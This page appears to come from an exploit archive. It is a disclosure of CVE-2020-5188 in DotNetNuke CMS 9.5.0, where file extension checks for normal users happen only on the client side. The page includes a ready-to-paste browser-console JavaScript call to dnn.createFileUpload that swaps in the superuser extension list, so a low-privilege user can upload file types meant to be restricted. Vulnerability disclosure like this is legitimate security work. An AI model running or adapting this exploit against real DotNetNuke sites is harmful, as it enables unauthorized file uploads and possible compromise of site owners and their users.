what you don't know can hurt you

DotNetNuke CMS 9.5.0 File Extension Check Bypass

DotNetNuke CMS 9.5.0 File Extension Check Bypass
Posted Feb 24, 2020
Authored by Sajjad Pourali

DotNetNuke CMS version 9.5.0 suffers from file extension check bypass vulnerability that allows for arbitrary file upload.

tags | exploit, arbitrary, bypass, file upload
advisories | CVE-2020-5188
MD5 | b8d76ca694f11feae28306337a7aab8e

DotNetNuke CMS 9.5.0 File Extension Check Bypass

Change Mirror Download
# Exploit Title: File upload vulnerability through bypassing client-side file extension check
# Date: 23 Feb 2020
# Exploit Author: Sajjad Pourali
# Vendor Homepage: http://dnnsoftware.com/
# Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases/download/v9.5.0/DNN_Platform_9.5.0_Install.zip
# Version: <= 9.5
# CVE : CVE-2020-5188
# More Info: https://medium.com/@SajjadPourali/dnn-dotnetnuke-cms-not-as-secure-as-you-think-e8516f789175

The DNN has a file upload module for superuser. As a superuser, you can upload files with the following formats — “jpg, jpeg, jpe, gif, bmp, png, svg, ttf, eot, woff, doc, docx, xls, xlsx, ppt, pptx, pdf, txt, xml, xsl, xsd, css, zip, rar, template, htmtemplate, ico, avi, mpg, mpeg, mp3, wmv, mov, wav, mp4, webm, ogv”.

As a normal user you are allowed to upload files with “bmp,gif,ico,jpeg,jpg,jpe,png,svg” extensions. The same file upload module used for superuser is reused for normal users with extra validation for a few additional extensions e.g. CSS extension is not allowed.

Unfortunately, only for superuser, whitelisted extension check is performed at the server end. For normal users, extra extension validation is performed at client-side only. Hence, a low privileged normal user can bypass the client-side validation and upload files with extensions which are allowed only for superuser only.

For example, a normal privileged user can upload a file with extension which is allowed only for superuser, by executing the following code on a browser’s console (in the tab that manages profile’s page has opened). This attack may also be performed using proxy tools such as Burp, ZAP etc.

dnn.createFileUpload({
"clientId": "dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_FileUploadControl",
"moduleId": "",
"parentClientId": null,
"showOnStartup": true,
"folderPicker": {
"selectedItemCss": "selected-item",
"internalStateFieldId": null,
"disabled": false,
"selectItemDefaultText": "",
"initialState": {
"selectedItem": {
"key": "0",
"value": "My Folder"
}
},
"onSelectionChanged": []
},
"maxFileSize": 299892736,
"maxFiles": 0,
"extensions": ["jpg", "jpeg", "jpe", "gif", "bmp", "png", "svg", "ttf", "eot", "woff", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "xml", "xsl", "xsd", "css", "zip", "rar", "template", "htmtemplate", "ico", "avi", "mpg", "mpeg", "mp3", "wmv", "mov", "wav", "mp4", "webm", "ogv"],
"resources": {
"title": "Upload Files",
"decompressLabel": "Decompress Zip Files",
"uploadToFolderLabel": "Upload To:",
"dragAndDropAreaTitle": "Drag files here or click to browse",
"uploadFileMethod": "Upload File",
"uploadFromWebMethod": "From URL",
"closeButtonText": "Close",
"uploadFromWebButtonText": "Upload",
"decompressingFile": "Decompressing File",
"fileIsTooLarge": "File size bigger than 286. Mb",
"fileUploadCancelled": "Upload cancelled",
"fileUploadFailed": "Upload failed",
"fileUploaded": "File uploaded",
"emptyFileUpload": "Your browser does not support empty file uploads.",
"fileAlreadyExists": "The file you want to upload already exists in this folder.",
"uploadStopped": "File upload stopped",
"urlTooltip": "Enter Resource URL like https://SomeWebSite.com/Images/About.png",
"keepButtonText": "Keep",
"replaceButtonText": "Replace",
"tooManyFiles": "You cannot upload more than {0} file(s) at once.",
"invalidFileExtensions": "Some selected files with invalid extensions are excluded from upload. You can only upload files with the following extensions: bmp, gif, ico, jpeg, jpg, jpe, png, svg.",
"unzipFilePromptTitle": "Unzip Information",
"unzipFileFailedPromptBody": "<div class=\"invalidFiles\"><p>[COUNT] of [TOTAL] file(s) were not extracted because their file types are not supported:</p>[FILELIST]</div>",
"unzipFileSuccessPromptBody": "<div class=\"validFiles\"><p>[TOTAL] of [TOTAL] file(s) were extracted successfully.</p></div>",
"errorDialogTitle": "Error"
},
"width": 780,
"height": 630,
"folderPath": dnn.dnnFileUpload.settings.dnn_ctr_EditUser_Profile_ProfileProperties_Photo_PhotoFileControl_dnnFileUploadScope.folder,
"parameters": {}
});
Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    1 Files
  • 29
    Nov 29th
    11 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close